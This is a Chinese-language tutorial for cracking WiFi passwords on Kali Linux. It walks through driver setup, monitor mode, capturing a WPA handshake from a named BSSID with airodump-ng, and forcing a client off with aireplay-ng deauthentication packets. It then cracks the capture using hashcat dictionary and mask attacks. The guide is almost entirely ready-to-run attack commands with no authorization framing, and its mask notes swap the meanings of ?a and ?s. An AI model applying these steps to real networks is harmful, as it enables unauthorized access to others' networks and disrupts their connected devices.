kali wifi 破解

目录

• 安装驱动
• 抓包
  • 准备工作
  • 开始抓包
• hashcat爆破密码
  • 转换包格式
  • 爆破

安装驱动

本人使用rt8811CU,安装驱动踩了好多坑，

#更新系统
sudo apt-get update
sudo apt-get upgrade
sudo apt-get dist-upgrade -y
#更新后记得重启

#后面参考：https://github.com/brektrou/rtl8821CU
#报错'linux-headers-x.x.x-kalix-amd64'(具体啥忘了0.0) 参考https://blog.cwsya.com/16.html
# sudo apt-get install build-essential linux-headers-$(uname -r)

#github rtl8821CU 安装失败尝试
sudo apt install realtek-rtl88xxau-dkms

参考

https://github.com/brektrou/rtl8821CU
https://online-it.nu/how-to-install-alfa-awus1900-kali-linux-2018-4/
https://blog.cwsya.com/16.html

抓包

准备工作

airmon-ng check kill #防止后面抓包时被其他进程影响
iwconfig
#选择无线网卡，形如wlan0
airmon-ng start wlan0 #打开监听
iwconfig #查看网卡名是否变化 （测试未变，仍为wlan0，但可能会变wlan0mon）

开始抓包

airodump-ng wlan0 #开启监听模式后的网卡名
airodump-ng  -c 1 --bssid 38:E1:AA:95:FF:78 wlan0 -w freedom
#-c 指定信道，--bssid 指定目标wifi的mac，-w 指定抓包保存文件名

新开终端

#注入攻击
aireplay-ng -0 20 -a 38:E1:AA:95:FF:78 -c 42:32:F1:98:6D:8C wlan0
#-0 20 攻击包数量 -a wifi的mac -c wifi连接设备（session） mac

当右上角,出现handshake 即抓到握手包

hashcat爆破密码

转换包格式

hcxpcapngtool  xxx.cap -o yyy.hc22000

爆破

hashcat -m 22000 out.hc22000 -o key.txt -a 0 WIFIpswddict.txt
# -a 0字典攻击 后面可跟目录或文件

攻击模式

-a
0 Straight（字典破解）
1 Combination（组合破解）
3 Brute-force（掩码暴力破解）
6 Hybrid dict + mask（混合字典+掩码）
7 Hybrid mask + dict（混合掩码+字典）

掩码

?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = !"#$%&'()*+,-./:;<=>?@[]^_`{|}~
?a = ?l?u?d?s
?l表示a-z，
?u表示A-Z，
?d表示0-9，
?a表示键盘上所有的特殊字符，
?s表示键盘上所有的可见字符，
?h表示8bit 0xc0-0xff的十六进制，
?D表示8bit的德语字符，
?F表示8bit的法语字符，
?R表示8bit的俄语字符。